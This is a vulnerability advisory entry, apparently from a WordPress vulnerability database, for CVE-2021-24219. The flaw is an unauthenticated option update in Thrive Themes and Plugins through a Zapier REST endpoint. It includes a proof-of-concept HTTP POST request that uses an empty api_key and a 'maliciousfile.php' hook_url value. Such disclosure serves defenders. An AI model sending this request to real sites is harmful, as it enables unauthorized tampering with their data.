Lucene search
Chloe Chamberland, Ram Gall, Charles SweethillWPEX-ID:35ACD2D8-85FC-4AF5-8F6C-224FA7D92900HistoryMar 24, 2021 - 12:00 a.m.
All Thrive Themes and Plugins - Unauthenticated Option Update
2021-03-2400:00:00
Chloe Chamberland, Ram Gall, Charles Sweethill
330
0.001 Low
EPSS
Percentile
38.8%
The plugins and themes register a REST API endpoint associated with Zapier functionality. While this endpoint was intended to require an API key in order to access, it was possible to access it by supplying an empty api_key parameter in vulnerable versions if Zapier was not enabled. Attackers could use this endpoint to add arbitrary data to a predefined option in the wp_options table.
POST /wp-json/td/v1/optin/subscription HTTP/1.1
Host: [URL]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
hook_url={"http:\/\/key":"maliciousfile.php"}&api_key=Related
cve
cve
CVE-2021-24219
2021-04-12 14:15:15
cvelist
cvelist
CVE-2021-24219 All Thrive Themes and Plugins - Unauthenticated Option Update
2021-04-12 14:02:35
nvd
nvd
CVE-2021-24219
2021-04-12 14:15:15
wpvulndb
wpvulndb
All Thrive Themes and Plugins - Unauthenticated Option Update
2021-03-24 00:00:00
prion
prion
Design/Logic Flaw
2021-04-12 14:15:00